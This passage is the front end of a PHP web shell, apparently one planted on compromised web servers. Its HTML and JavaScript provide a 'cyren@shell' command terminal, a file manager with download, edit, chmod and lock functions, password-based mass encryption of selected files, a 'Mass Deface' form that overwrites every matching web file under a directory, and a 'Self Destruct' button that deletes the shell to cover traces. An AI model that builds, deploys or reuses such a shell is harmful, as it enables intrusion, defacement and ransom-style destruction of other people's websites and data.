        ::-webkit-scrollbar-thumb {
            background: var(--accent-primary);
            border-radius: 10px;
        }
        
        ::-webkit-scrollbar-thumb:hover {
            background: var(--accent-secondary);
        }
        
        .loading-indicator {
            position: fixed;
            top: 20px;
            right: 20px;
            background: var(--accent-primary);
            color: white;
            padding: 10px 20px;
            border-radius: 20px;
            z-index: 10001;
            display: none;
            animation: pulse 1.5s infinite;
        }
        
        @keyframes pulse {
            0% { opacity: 1; }
            50% { opacity: 0.5; }
            100% { opacity: 1; }
        }
        
        .home-btn {
            padding: 8px 15px;
            background: linear-gradient(135deg, var(--accent-primary), var(--accent-secondary));
            border-radius: 6px;
            color: white;
            text-decoration: none;
            font-size: 14px;
            display: inline-flex;
            align-items: center;
            gap: 5px;
        }
        
        .result-badge {
            display: inline-block;
            padding: 4px 8px;
            border-radius: 4px;
            font-size: 12px;
            font-weight: bold;
            margin-left: 10px;
        }
        
        .result-success {
            background: var(--success);
            color: white;
        }
        
        .result-error {
            background: var(--danger);
            color: white;
        }
        
        .result-warning {
            background: var(--warning);
            color: white;
        }
        
        .deface-result {
            background: var(--bg-tertiary);
            border-radius: 8px;
            padding: 15px;
            margin-top: 20px;
            border-left: 4px solid var(--success);
        }
        
        .deface-result.error {
            border-left-color: var(--danger);
        }
        
        .deface-result h4 {
            margin-bottom: 10px;
            color: var(--text-primary);
        }
        
        .deface-result p {
            color: var(--text-secondary);
            font-size: 14px;
        }
        
        .terminal-prompt {
            color: #00ff00;
            font-weight: bold;
            margin-bottom: 5px;
        }
        
        .terminal-prompt::before {
            content: "cyren@shell:";
            color: #00ff00;
        }
        
        .terminal-prompt::after {
            content: "$ ";
            color: #00ff00;
        }
        
        .file-type-indicator {
            display: inline-block;
            width: 12px;
            height: 12px;
            border-radius: 2px;
            margin-right: 5px;
        }
        
        .file-type-indicator.dir {
            background: var(--success);
        }
        
        .file-type-indicator.file {
            background: var(--accent-primary);
        }
        
        .selection-counter {
            position: fixed;
            bottom: 20px;
            right: 20px;
            background: var(--accent-primary);
            color: white;
            padding: 10px 15px;
            border-radius: 20px;
            font-size: 14px;
            font-weight: bold;
            z-index: 9999;
            box-shadow: 0 5px 15px rgba(102, 126, 234, 0.3);
            display: none;
        }
        
        .clear-search {
            position: absolute;
            right: 10px;
            top: 50%;
            transform: translateY(-50%);
            background: transparent;
            border: none;
            color: var(--text-tertiary);
            cursor: pointer;
            font-size: 16px;
            display: none;
        }
        
        .search-input:not(:placeholder-shown) + .clear-search {
            display: block;
        }
        
        .lock-indicator {
            background: var(--info);
            color: white;
            padding: 2px 5px;
            border-radius: 3px;
            font-size: 10px;
            margin-left: 5px;
        }
        
        .highlight-scroll-target {
            animation: highlightPulse 2s ease;
            border: 2px solid var(--accent-primary) !important;
            box-shadow: 0 0 20px rgba(102, 126, 234, 0.5) !important;
            background: rgba(102, 126, 234, 0.15) !important;
            position: relative;
            z-index: 1000;
        }
        
        @keyframes highlightPulse {
            0% { 
                border-color: var(--accent-primary);
                box-shadow: 0 0 0 rgba(102, 126, 234, 0.5);
                background: rgba(102, 126, 234, 0.05);
            }
            50% { 
                border-color: var(--accent-secondary);
                box-shadow: 0 0 20px rgba(102, 126, 234, 0.7);
                background: rgba(102, 126, 234, 0.2);
            }
            100% { 
                border-color: var(--accent-primary);
                box-shadow: 0 0 5px rgba(102, 126, 234, 0.3);
                background: rgba(102, 126, 234, 0.1);
            }
        }
        
        .tab-content {
            display: none;
        }
        
        .tab-content.active {
            display: block;
        }
    </style>
</head>
<body>
    <?php if ($show_notification && $operation_result): ?>
    <div class="notification <?php echo $operation_type; ?>">
        <div class="notification-title">
            <?php if ($operation_type == 'success'): ?>✓ Success<?php endif; ?>
            <?php if ($operation_type == 'error'): ?>✗ Error<?php endif; ?>
            <?php if ($operation_type == 'info'): ?>ℹ Info<?php endif; ?>
        </div>
        <div class="notification-message"><?php echo htmlspecialchars($operation_result); ?></div>
        <?php if (isset($operation_details) && $operation_details): ?>
        <div class="notification-details"><?php echo htmlspecialchars($operation_details); ?></div>
        <?php endif; ?>
        <button onclick="this.parentElement.style.display='none'" style="background:none;border:none;color:var(--text-secondary);cursor:pointer;margin-left:auto;font-size:12px;">✕ Close</button>
    </div>
    <?php endif; ?>
    
    <div class="selection-counter" id="selectionCounter">0 selected</div>
    
    <div class="panel">
        <div class="header-container">
            <h1 class="text-gradient"><?php echo $SHELL_NAME; ?> ACCESS GRANTED</h1>
            <div class="site-info">
                <span title="Current Directory"><?php echo htmlspecialchars($current_dir); ?></span>
                <span title="PHP Version">PHP <?php echo $PHP_VERSION; ?></span>
                <a href="?logout=1" class="home-btn">Logout</a>
            </div>
        </div>
        
        <div class="tabs-container">
            <button class="tab-btn active" onclick="switchTab('filemanager')" id="tabBtnFilemanager">
                File Manager
            </button>
            <button class="tab-btn" onclick="switchTab('terminal')" id="tabBtnTerminal">
                Terminal
            </button>
            <button class="tab-btn" onclick="switchTab('massdeface')" id="tabBtnMassdeface">
                Mass Deface
            </button>
            <button class="tab-btn" onclick="switchTab('tools')" id="tabBtnTools">
                System Tools
            </button>
        </div>
        
        <div class="path-navigator">
            <div class="path-breadcrumb">
                <div class="path-segment">
                    <a href="?cwd=<?php echo urlencode($DEFAULT_DIR); ?>" class="home-btn" onclick="event.preventDefault(); navigateToPath('<?php echo $DEFAULT_DIR; ?>');">
                        Home Directory
                    </a>
                </div>
            </div>
            
            <div class="path-tool-item">
                <div class="path-input-group">
                    <input type="text" id="manualPathInput" class="path-input" 
                           placeholder="Enter path" 
                           value="<?php echo htmlspecialchars($current_dir); ?>">
                    <button type="button" class="path-btn" onclick="changePath()">Go</button>
                </div>
            </div>
        </div>
        
        <div id="filemanager" class="tab-content active">
            <div class="file-manager-header">
                <div class="search-container">
                    <input type="text" class="search-input" placeholder="Search files..." 
                           value="<?php echo htmlspecialchars($search_query); ?>"
                           onkeyup="handleSearch(event)" 
                           onfocus="showSuggestions()"
                           onblur="hideSuggestions()"
                           id="searchInput">
                    <button class="clear-search" onclick="clearSearch()" title="Clear search">✕</button>
                    <div class="search-suggestions" id="searchSuggestions"></div>
                </div>
                
                <div style="display: flex; gap: 10px; flex-wrap: wrap;">
                    <button class="btn-primary" onclick="showModal('uploadModal')">
                        Upload
                    </button>
                    <button class="btn-primary" onclick="showModal('createModal')">
                        Create
                    </button>
                </div>
            </div>
            
            <?php if ($search_query && !empty($search_results)): ?>
            <div style="margin-bottom: 15px; padding: 10px; background: var(--bg-tertiary); border-radius: 8px; display: flex; justify-content: space-between; align-items: center;">
                <div>
                    <strong>Search Results for "<?php echo htmlspecialchars($search_query); ?>":</strong> 
                    <?php echo count($search_results); ?> items found
                </div>
                <button onclick="clearSearch()" style="background: var(--danger); border: none; color: white; padding: 5px 10px; border-radius: 4px; cursor: pointer; font-size: 12px;">
                    Clear Search
                </button>
            </div>
            <?php endif; ?>
            
            <div class="mass-actions" id="massActions">
                <button class="mass-btn" onclick="massSelectAll()">Select All</button>
                <button class="mass-btn" onclick="massDeselectAll()">Deselect All</button>
                <button class="mass-btn" onclick="massEncrypt()">Encrypt Selected</button>
                <button class="mass-btn" onclick="massDecrypt()">Decrypt Selected</button>
                <button class="mass-btn" onclick="massZip()">Zip Selected</button>
                <button class="btn-danger" onclick="massDelete()">Delete Selected</button>
            </div>
            
            <div class="file-grid">
                <?php 
                $display_files = $search_query && !empty($search_results) ? $search_results : $files;
                if (empty($display_files)): ?>
                <div style="grid-column: 1/-1; text-align: center; padding: 40px; color: var(--text-tertiary);">
                    <h3 style="margin-bottom: 10px;">Directory Empty</h3>
                    <p>No files or folders found in this directory</p>
                </div>
                <?php else: ?>
                <?php foreach ($display_files as $item): ?>
                <?php 
                $is_locked = ($item['permissions'] == '0444' || $item['permissions'] == '0555' || 
                              substr($item['permissions'], 1, 1) == '4' || substr($item['permissions'], 1, 1) == '5');
                ?>
                <div class="file-item" id="file-<?php echo md5($item['path']); ?>" data-file-name="<?php echo htmlspecialchars($item['name']); ?>">
                    <input type="checkbox" class="file-checkbox" 
                           onchange="updateSelection()" 
                           value="<?php echo urlencode($item['path']); ?>"
                           data-encrypted="<?php echo $item['encrypted'] ? '1' : '0'; ?>"
                           <?php if ($is_locked) echo 'title="Locked file - permissions may be restricted"'; ?>>
                    
                    <div class="file-name">
                        <span class="file-type-indicator <?php echo $item['type']; ?>"></span>
                        <?php echo htmlspecialchars($item['name']); ?>
                        <?php if ($item['encrypted']): ?>
                        <span class="result-badge result-success">ENCRYPTED</span>
                        <?php endif; ?>
                        <?php if (!$item['readable']): ?>
                        <span class="result-badge result-error">NO READ</span>
                        <?php endif; ?>
                        <?php if (!$item['writable']): ?>
                        <span class="result-badge result-warning">NO WRITE</span>
                        <?php endif; ?>
                        <?php if ($is_locked): ?>
                        <span class="lock-indicator">LOCKED</span>
                        <?php endif; ?>
                    </div>
                    
                    <div class="file-details">
                        <div>Type: <?php echo $item['type'] == 'dir' ? 'Directory' : 'File'; ?></div>
                        <div>Size: <?php echo formatBytes($item['size']); ?></div>
                        <div>Permissions: <?php echo $item['permissions']; ?> <?php if ($is_locked): ?>(Locked)<?php endif; ?></div>
                        <div>Modified: <?php echo date('Y-m-d H:i', $item['modified']); ?></div>
                    </div>
                    
                    <div class="file-actions">
                        <?php if ($item['type'] == 'dir'): ?>
                        <button class="action-btn" onclick="navigateToPath('<?php echo htmlspecialchars($item['path']); ?>')">
                            Open
                        </button>
                        <?php else: ?>
                        <button class="action-btn" onclick="downloadFile('<?php echo htmlspecialchars($item['path']); ?>')">
                            Download
                        </button>
                        <?php endif; ?>
                        
                        <button class="action-btn" onclick="editFile('<?php echo htmlspecialchars($item['path']); ?>')">
                            Edit
                        </button>
                        
                        <button class="action-btn" onclick="renameItem('<?php echo htmlspecialchars($item['path']); ?>')">
                            Rename
                        </button>
                        
                        <button class="action-btn chmod-btn" onclick="chmodItem('<?php echo htmlspecialchars($item['path']); ?>')">
                            Chmod
                        </button>
                        
                        <?php if ($item['type'] == 'file'): ?>
                            <?php if ($item['encrypted']): ?>
                            <button class="action-btn" onclick="decryptFile('<?php echo htmlspecialchars($item['path']); ?>')">
                                Decrypt
                            </button>
                            <?php else: ?>
                            <button class="action-btn" onclick="encryptFile('<?php echo htmlspecialchars($item['path']); ?>')">
                                Encrypt
                            </button>
                            <?php endif; ?>
                        <?php endif; ?>
                        
                        <?php if ($item['type'] == 'file' && !$is_locked): ?>
                        <button class="action-btn lock-btn" onclick="lockFile('<?php echo htmlspecialchars($item['path']); ?>')">
                            Lock
                        </button>
                        <?php endif; ?>
                        
                        <button class="action-btn delete-btn" onclick="deleteItem('<?php echo htmlspecialchars($item['path']); ?>')">
                            Delete
                        </button>
                    </div>
                </div>
                <?php endforeach; ?>
                <?php endif; ?>
            </div>
        </div>
        
        <div id="terminal" class="tab-content">
            <div class="terminal-container" id="terminalOutput">
                <div class="terminal-output">
                    <?php if ($command_output): ?>
                    <div class="terminal-prompt"><?php echo htmlspecialchars($last_command ?? ''); ?></div>
                    <?php echo nl2br(htmlspecialchars($command_output)); ?>
                    <?php endif; ?>
                </div>
                <div class="terminal-scroll-indicator" id="scrollIndicator">Scroll for more</div>
            </div>
            
            <form method="POST" class="terminal-form" id="terminalForm" onsubmit="return submitTerminalForm(event);">
                <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>">
                <input type="hidden" name="current_tab" value="terminal">
                <input type="text" name="terminal_command" class="terminal-input" 
                       placeholder="Enter command (cd commands will update current directory)" 
                       id="terminalInput" autocomplete="off">
                <button type="submit" class="terminal-submit">Execute</button>
            </form>
            
            <div style="margin-top: 15px; font-size: 12px; color: var(--text-tertiary); display: flex; gap: 20px;">
                <div><strong>Current Directory:</strong> <?php echo htmlspecialchars($current_dir); ?></div>
            </div>
        </div>
        
        <div id="massdeface" class="tab-content">
            <div style="margin-bottom: 25px;">
                <h2 class="text-gradient" style="font-size: 24px; margin-bottom: 10px;">Mass Deface Tool</h2>
                <p style="color: var(--text-secondary); font-size: 14px;">
                    Replace content of multiple files with your deface message. Supports recursive directory traversal.
                </p>
            </div>
            
            <div class="deface-tabs">
                <button type="button" class="deface-tab-btn active" onclick="switchDefaceTab('text')">Text Input</button>
                <button type="button" class="deface-tab-btn" onclick="switchDefaceTab('file')">File Upload</button>
            </div>
            
            <form method="POST" class="deface-form" enctype="multipart/form-data" id="defaceForm" onsubmit="showLoader();">
                <input type="hidden" name="action" value="mass_deface">
                
                <div id="defaceTextTab" class="deface-tab-content active">
                    <div class="form-group">
                        <label class="form-label">Deface Content</label>
                        <textarea name="deface_content" class="form-textarea" placeholder="Enter deface content..."></textarea>
                    </div>
                </div>
                
                <div id="defaceFileTab" class="deface-tab-content">
                    <div class="form-group">
                        <label class="form-label">Upload HTML/Text File</label>
                        <input type="file" name="deface_file" class="form-input" accept=".html,.htm,.php,.txt,.js,.css">
                        <p style="font-size: 12px; color: #888; margin-top: 5px;">Supported: .html, .htm, .php, .txt, .js, .css</p>
                    </div>
                </div>
                
                <div class="form-group">
                    <label class="form-label">Target Directory</label>
                    <input type="text" name="deface_path" class="form-input" 
                           value="<?php echo htmlspecialchars($current_dir); ?>" 
                           placeholder="Path to start deface operation" required>
                </div>
                
                <div class="form-group">
                    <label class="form-label">File Extensions (comma separated)</label>
                    <input type="text" name="deface_extensions" class="form-input" 
                           value="html,php,htm,asp,aspx,txt,js,css" 
                           placeholder="html,php,htm,asp,aspx" required>
                </div>
                
                <button type="submit" class="btn-danger" style="width: 100%; padding: 15px; font-size: 16px;">
                    EXECUTE MASS DEFACE
                </button>
            </form>
            
            <?php if ($mass_deface_count > 0): ?>
            <div class="deface-result">
                <h4>Deface Operation Complete</h4>
                <p><strong>Total Files Defaced:</strong> <?php echo $mass_deface_count; ?></p>
                <p><strong>Target Directory:</strong> <?php echo htmlspecialchars($current_dir); ?></p>
                <p><strong>Extensions Targeted:</strong> <?php echo isset($_POST['deface_extensions']) ? htmlspecialchars($_POST['deface_extensions']) : 'html,php,htm,asp,aspx,txt,js,css'; ?></p>
            </div>
            <?php endif; ?>
        </div>
        
        <div id="tools" class="tab-content">
            <div style="margin-bottom: 25px;">
                <h2 class="text-gradient" style="font-size: 24px; margin-bottom: 10px;">System Tools</h2>
                <p style="color: var(--text-secondary); font-size: 14px;">
                    System information and administration tools
                </p>
            </div>
            
            <div class="system-info-grid">
                <?php foreach ($system_info as $key => $value): ?>
                <div class="info-card">
                    <h3><?php echo htmlspecialchars($key); ?></h3>
                    <p><?php echo htmlspecialchars($value); ?></p>
                </div>
                <?php endforeach; ?>
            </div>
            
            <div style="margin-top: 30px;">
                <h3 style="margin-bottom: 15px; color: var(--text-primary);">Quick Actions</h3>
                <div style="display: grid; grid-template-columns: repeat(auto-fill, minmax(200px, 1fr)); gap: 12px;">
                    <button class="btn-danger" style="padding: 15px; font-size: 14px;" onclick="selfDestruct()">
                        Self Destruct
                    </button>
                </div>
            </div>
        </div>
    </div>
    
    <div id="editModal" class="modal-overlay">
        <div class="edit-modal-content">
            <div class="edit-header">
                <h3 class="modal-title" id="editModalTitle">Edit File</h3>
            </div>
            <div class="edit-textarea-container">
                <textarea id="editFileContent" class="edit-textarea" spellcheck="false"></textarea>
                <input type="hidden" id="editFilePath">
            </div>
            <div class="edit-footer">
                <button class="btn-primary" onclick="saveEdit()" style="flex: 1;">Save Changes</button>
                <button class="mass-btn" onclick="hideModal('editModal')" style="flex: 1;">Cancel</button>
            </div>
        </div>
    </div>
    
    <div id="encryptModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title">Encrypt File</h3>
            <input type="hidden" id="encryptFilePath">
            <input type="password" id="encryptPassword" class="form-input" placeholder="Enter encryption password" autocomplete="new-password" required>
            <div style="display: flex; gap: 10px; margin-top: 20px;">
                <button class="btn-primary" onclick="performEncrypt()" style="flex: 1;">Encrypt</button>
                <button class="mass-btn" onclick="hideModal('encryptModal')" style="flex: 1;">Cancel</button>
            </div>
        </div>
    </div>
    
    <div id="decryptModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title">Decrypt File</h3>
            <input type="hidden" id="decryptFilePath">
            <input type="password" id="decryptPassword" class="form-input" placeholder="Enter decryption password" autocomplete="new-password" required>
            <div style="display: flex; gap: 10px; margin-top: 20px;">
                <button class="btn-primary" onclick="performDecrypt()" style="flex: 1;">Decrypt</button>
                <button class="mass-btn" onclick="hideModal('decryptModal')" style="flex: 1;">Cancel</button>
            </div>
        </div>
    </div>
    
    <div id="massEncryptModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title">Encrypt Selected Items</h3>
            <input type="password" id="massEncryptPassword" class="form-input" placeholder="Enter encryption password" autocomplete="new-password" required>
            <div style="display: flex; gap: 10px; margin-top: 20px;">
                <button class="btn-primary" onclick="performMassEncrypt()" style="flex: 1;">Encrypt Selected (<span id="encryptCount">0</span> items)</button>
                <button class="mass-btn" onclick="hideModal('massEncryptModal')" style="flex: 1;">Cancel</button>
            </div>
        </div>
    </div>
    
    <div id="massDecryptModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title">Decrypt Selected Items</h3>
            <input type="password" id="massDecryptPassword" class="form-input" placeholder="Enter decryption password" autocomplete="new-password" required>
            <div style="display: flex; gap: 10px; margin-top: 20px;">
                <button class="btn-primary" onclick="performMassDecrypt()" style="flex: 1;">Decrypt Selected (<span id="decryptCount">0</span> items)</button>
                <button class="mass-btn" onclick="hideModal('massDecryptModal')" style="flex: 1;">Cancel</button>
            </div>
        </div>
    </div>
    
    <div id="renameModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title">Rename Item</h3>
            <input type="hidden" id="renameOldPath">
            <input type="text" id="renameNewName" class="form-input" placeholder="Enter new name" required>
            <div style="display: flex; gap: 10px; margin-top: 20px;">
                <button class="btn-primary" onclick="performRename()" style="flex: 1;">Rename</button>
                <button class="mass-btn" onclick="hideModal('renameModal')" style="flex: 1;">Cancel</button>
            </div>
        </div>
    </div>
    
    <div id="chmodModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title">Change Permissions</h3>
            <input type="hidden" id="chmodPath">
            <input type="text" id="chmodPermission" class="form-input" placeholder="e.g., 755, 644, 0444" value="755" required>
            <div style="display: flex; gap: 10px; margin-top: 20px;">
                <button class="btn-primary" onclick="performChmod()" style="flex: 1;">Apply</button>
                <button class="mass-btn" onclick="hideModal('chmodModal')" style="flex: 1;">Cancel</button>
            </div>
            <div style="margin-top: 15px; font-size: 12px; color: var(--text-tertiary);">
                <strong>Common permissions:</strong><br>
                755 - Owner: read/write/execute, Group/Others: read/execute<br>
                644 - Owner: read/write, Group/Others: read only<br>
                0444 - Read only for everyone (LOCKED)<br>
                0555 - Read/execute only for everyone (LOCKED)
            </div>
        </div>
    </div>
    
    <div id="lockModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title">Lock File (Read-Only)</h3>
            <input type="hidden" id="lockPath">
            <p style="margin-bottom: 20px; color: var(--text-secondary);">
                This will set file permissions to read-only (0444) and apply additional protection.<br>
                <strong>Warning:</strong> This may prevent deletion or modification of the file.
            </p>
            <div style="display: flex; gap: 10px; margin-top: 20px;">
                <button class="btn-primary" onclick="performLock()" style="flex: 1;">Lock File</button>
                <button class="mass-btn" onclick="hideModal('lockModal')" style="flex: 1;">Cancel</button>
            </div>
        </div>
    </div>
    
    <div id="zipModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title">Create Zip Archive</h3>
            <input type="text" id="zipName" class="form-input" placeholder="Enter zip file name" value="archive" required>
            <div style="display: flex; gap: 10px; margin-top: 20px;">
                <button class="btn-primary" onclick="performZip()" style="flex: 1;">Create Zip (<span id="zipCount">0</span> items)</button>
                <button class="mass-btn" onclick="hideModal('zipModal')" style="flex: 1;">Cancel</button>
            </div>
        </div>
    </div>
    
    <div id="uploadModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title">Upload Files</h3>
            <form method="POST" enctype="multipart/form-data" id="uploadForm">
                <input type="hidden" name="action" value="upload">
                <input type="file" name="upload_file" id="fileInput" style="display: none;" onchange="handleFileSelect()">
            </form>
            <div style="border: 2px dashed var(--border-color); border-radius: 10px; padding: 40px; text-align: center; margin: 20px 0; cursor: pointer;" 
                 onclick="document.getElementById('fileInput').click()" 
                 ondrop="handleDrop(event)" 
                 ondragover="handleDragOver(event)">
                <p style="margin-bottom: 10px; font-weight: 600;">Drag & drop files here</p>
                <p style="color: var(--text-tertiary); font-size: 14px;">or click to browse</p>
            </div>
            <div style="display: flex; gap: 10px;">
                <button class="mass-btn" onclick="hideModal('uploadModal')" style="flex: 1;">Close</button>
            </div>
        </div>
    </div>
    
    <div id="createModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title">Create New</h3>
            <div style="display: grid; gap: 15px; margin-top: 20px;">
                <button class="mass-btn" style="padding: 20px; font-size: 16px; text-align: left;" onclick="createNew('file')">
                    <div>
                        <div style="font-weight: 700;">Create File</div>
                        <div style="font-size: 12px; color: var(--text-secondary);">Create a new text file</div>
                    </div>
                </button>
                <button class="mass-btn" style="padding: 20px; font-size: 16px; text-align: left;" onclick="createNew('folder')">
                    <div>
                        <div style="font-weight: 700;">Create Folder</div>
                        <div style="font-size: 12px; color: var(--text-secondary);">Create a new directory</div>
                    </div>
                </button>
            </div>
            <div style="margin-top: 25px;">
                <button class="mass-btn" onclick="hideModal('createModal')" style="width: 100%;">Cancel</button>
            </div>
        </div>
    </div>
    
    <div id="selfDestructModal" class="modal-overlay">
        <div class="modal-content">
            <h3 class="modal-title" style="color: var(--danger);">SELF DESTRUCT</h3>
            <p style="margin-bottom: 20px; color: var(--text-secondary); line-height: 1.6;">
                This action will permanently delete the shell file from the server.<br>
                <strong style="color: var(--danger);">This operation cannot be undone!</strong><br><br>
                Are you absolutely sure you want to continue?
            </p>
            <div style="display: flex; gap: 10px;">
                <button class="btn-danger" onclick="confirmSelfDestruct()" style="flex: 1;">
                    DESTROY SHELL
                </button>
                <button class="mass-btn" onclick="hideModal('selfDestructModal')" style="flex: 1;">
                    Cancel
                </button>
            </div>
        </div>
    </div>
    
    <div class="loading-indicator" id="loader">Processing...</div>
    
    <script>
    let selectedItems = new Set();
    let selectedEncryptedItems = new Set();
    let searchTimeout = null;
    
    document.addEventListener('DOMContentLoaded', function() {
        const savedTab = sessionStorage.getItem('activeTab');
        if (savedTab && document.getElementById(savedTab)) {
            switchTab(savedTab, false);
        }
        
        if (document.getElementById('terminal').classList.contains('active')) {
            setTimeout(() => {
                const terminalInput = document.getElementById('terminalInput');
                if (terminalInput) terminalInput.focus();
                scrollTerminalToBottom();
                checkTerminalScroll();
            }, 500);
            
            const terminalOutput = document.getElementById('terminalOutput');
            if (terminalOutput) {
                terminalOutput.addEventListener('scroll', checkTerminalScroll);
            }
        }
        
        if ('<?php echo $search_query; ?>' !== '') {
            const searchInput = document.getElementById('searchInput');
            if (searchInput) searchInput.focus();
        }
        
        document.addEventListener('keydown', function(e) {
            if (e.key === 'Escape') {
                document.querySelectorAll('.modal-overlay.active').forEach(modal => {
                    modal.classList.remove('active');
                });
            }
            
            if (e.ctrlKey && e.key === 'a' && document.getElementById('filemanager').classList.contains('active')) {
                e.preventDefault();
                massSelectAll();
            }
            
            if (e.key === 'Escape' && selectedItems.size > 0) {
                massDeselectAll();
            }
        });
        
        document.querySelectorAll('.modal-overlay').forEach(modal => {
            modal.addEventListener('click', function(e) {
                if (e.target === this) {
                    this.classList.remove('active');
                }
            });
        });
        
        setTimeout(() => {
            document.querySelectorAll('.notification').forEach(notification => {
                notification.style.display = 'none';
            });
        }, 5000);
        
        if (window.location.search.includes('result=1')) {
            const url = new URL(window.location);
            url.searchParams.delete('result');
            history.replaceState({}, '', url);
        }
    });
    
    function switchTab(tabName, saveToStorage = true) {
        document.querySelectorAll('.tab-content').forEach(tab => {
            tab.classList.remove('active');
            tab.style.display = 'none';
        });
        
        const activeTab = document.getElementById(tabName);
        activeTab.classList.add('active');
        activeTab.style.display = 'block';
        
        document.querySelectorAll('.tab-btn').forEach(btn => {
            btn.classList.remove('active');
        });
        document.getElementById('tabBtn' + tabName.charAt(0).toUpperCase() + tabName.slice(1)).classList.add('active');
        
        if (saveToStorage) {
            sessionStorage.setItem('activeTab', tabName);
        }
        
        if (tabName === 'terminal') {
            setTimeout(() => {
                const terminalInput = document.getElementById('terminalInput');
                if (terminalInput) terminalInput.focus();
                scrollTerminalToBottom();
                checkTerminalScroll();
            }, 100);
        }
        
        if (tabName !== 'filemanager') {
            clearSearchWithoutRefresh();
        }
    }
    
    function submitTerminalForm(event) {
        event.preventDefault();
        showLoader();
        
        const form = document.getElementById('terminalForm');
        const formData = new FormData(form);
        
        fetch('', {
            method: 'POST',
            body: formData
        })
        .then(response => {
            hideLoader();
            window.location.reload();
        })
        .catch(error => {
            hideLoader();
            console.error('Error:', error);
        });
        
        return false;
    }
    
    function navigateToPath(path) {
        showLoader();
        const url = new URL(window.location);
        url.searchParams.set('cwd', path);
        url.searchParams.delete('search');
        url.searchParams.delete('result');
        window.location.href = url;
    }
    
    function changePath() {
        const path = document.getElementById('manualPathInput').value;
        if (path.trim()) {
            navigateToPath(path);
        }
    }
    
    function updateSelection() {
        selectedItems.clear();
        selectedEncryptedItems.clear();
        
        const checkboxes = document.querySelectorAll('.file-checkbox:checked');
        checkboxes.forEach(cb => {
            selectedItems.add(cb.value);
            if (cb.dataset.encrypted === '1') {
                selectedEncryptedItems.add(cb.value);
            }
        });
        
        const massActions = document.getElementById('massActions');
        const selectionCounter = document.getElementById('selectionCounter');
        
        if (selectedItems.size > 0) {
            massActions.style.display = 'flex';
            selectionCounter.style.display = 'block';
            selectionCounter.textContent = selectedItems.size + ' selected';
        } else {
            massActions.style.display = 'none';
            selectionCounter.style.display = 'none';
        }
    }
    
    function massSelectAll() {
        document.querySelectorAll('.file-checkbox').forEach(cb => {
            cb.checked = true;
        });
        updateSelection();
    }
    
    function massDeselectAll() {
        document.querySelectorAll('.file-checkbox').forEach(cb => {
            cb.checked = false;
        });
        updateSelection();
    }
    
    function massDelete() {
        if (selectedItems.size === 0) return;
        
        if (confirm(`Delete ${selectedItems.size} selected items? This action cannot be undone.`)) {
            showLoader();
            const form = document.createElement('form');
            form.method = 'POST';
            form.innerHTML = `<input type="hidden" name="action" value="mass_delete">`;
            
            selectedItems.forEach(item => {
                form.innerHTML += `<input type="hidden" name="selected_items[]" value="${item}">`;
            });
            
            document.body.appendChild(form);
            form.submit();
        }
    }
    
    function deleteItem(path) {
        if (confirm('Delete "' + path.split('/').pop() + '"? This action cannot be undone.')) {
            showLoader();
            const form = document.createElement('form');
            form.method = 'POST';
            form.innerHTML = `
                <input type="hidden" name="action" value="delete_single">
                <input type="hidden" name="delete_path" value="${path}">
            `;
            document.body.appendChild(form);
            form.submit();
        }
    }
    
    function massEncrypt() {
        if (selectedItems.size === 0) {
            alert('Please select items first');
            return;
        }
        document.getElementById('encryptCount').textContent = selectedItems.size;
        showModal('massEncryptModal');
    }
    
    function massDecrypt() {
        if (selectedItems.size === 0) {
            alert('Please select items first');
            return;
        }
        document.getElementById('decryptCount').textContent = selectedItems.size;
        showModal('massDecryptModal');
    }
    
    function massZip() {
        if (selectedItems.size === 0) {
            alert('Please select items first');
            return;
        }
        document.getElementById('zipCount').textContent = selectedItems.size;
        showModal('zipModal');
    }
    
    function downloadFile(path) {
        window.open('?download=' + encodeURIComponent(path), '_blank');
    }
    
    function editFile(path) {
        showLoader();
        fetch('?getfile=' + encodeURIComponent(path))
            .then(response => {
                if (!response.ok) throw new Error('Network response was not ok');
                return response.text();
            })
            .then(data => {
                document.getElementById('editFilePath').value = path;
                document.getElementById('editFileContent').value = data;
                document.getElementById('editModalTitle').textContent = 'Edit: ' + path.split('/').pop();
                
                setTimeout(() => {
                    showModal('editModal');
                    hideLoader();
                    
                    const textarea = document.getElementById('editFileContent');
                    textarea.focus();
                    textarea.selectionStart = textarea.value.length;
                    textarea.selectionEnd = textarea.value.length;
                }, 100);
            })
            .catch(error => {
                hideLoader();
                alert('Error loading file: ' + error.message);
            });
    }
    
    function saveEdit() {
        const path = document.getElementById('editFilePath').value;
        const content = document.getElementById('editFileContent').value;
        
        showLoader();
        
        const form = document.createElement('form');
        form.method = 'POST';
        form.style.display = 'none';
        
        const actionField = document.createElement('input');
        actionField.type = 'hidden';
        actionField.name = 'action';
        actionField.value = 'edit_file';
        form.appendChild(actionField);
        
        const pathField = document.createElement('input');
        pathField.type = 'hidden';
        pathField.name = 'edit_path';
        pathField.value = path;
        form.appendChild(pathField);
        
        const contentField = document.createElement('textarea');
        contentField.name = 'edit_content';
        contentField.style.display = 'none';
        contentField.textContent = content;
        form.appendChild(contentField);
        
        document.body.appendChild(form);
        form.submit();
    }
    
    function encryptFile(path) {
        document.getElementById('encryptFilePath').value = path;
        showModal('encryptModal');
    }
    
    function performEncrypt() {
        const path = document.getElementById('encryptFilePath').value;
        const password = document.getElementById('encryptPassword').value;
        
        if (!password) {
            alert('Please enter a password');
            return;
        }
        
        showLoader();
        const form = document.createElement('form');
        form.method = 'POST';
        form.innerHTML = `
            <input type="hidden" name="action" value="encrypt_file">
            <input type="hidden" name="file" value="${path}">
            <input type="hidden" name="encrypt_password" value="${password}">
        `;
        document.body.appendChild(form);
        form.submit();
    }
    
    function decryptFile(path) {
        document.getElementById('decryptFilePath').value = path;
        showModal('decryptModal');
    }
    
    function performDecrypt() {
        const path = document.getElementById('decryptFilePath').value;
        const password = document.getElementById('decryptPassword').value;
        
        if (!password) {
            alert('Please enter a password');
            return;
        }
        
        showLoader();
        const form = document.createElement('form');
        form.method = 'POST';
        form.innerHTML = `
            <input type="hidden" name="action" value="decrypt_file">
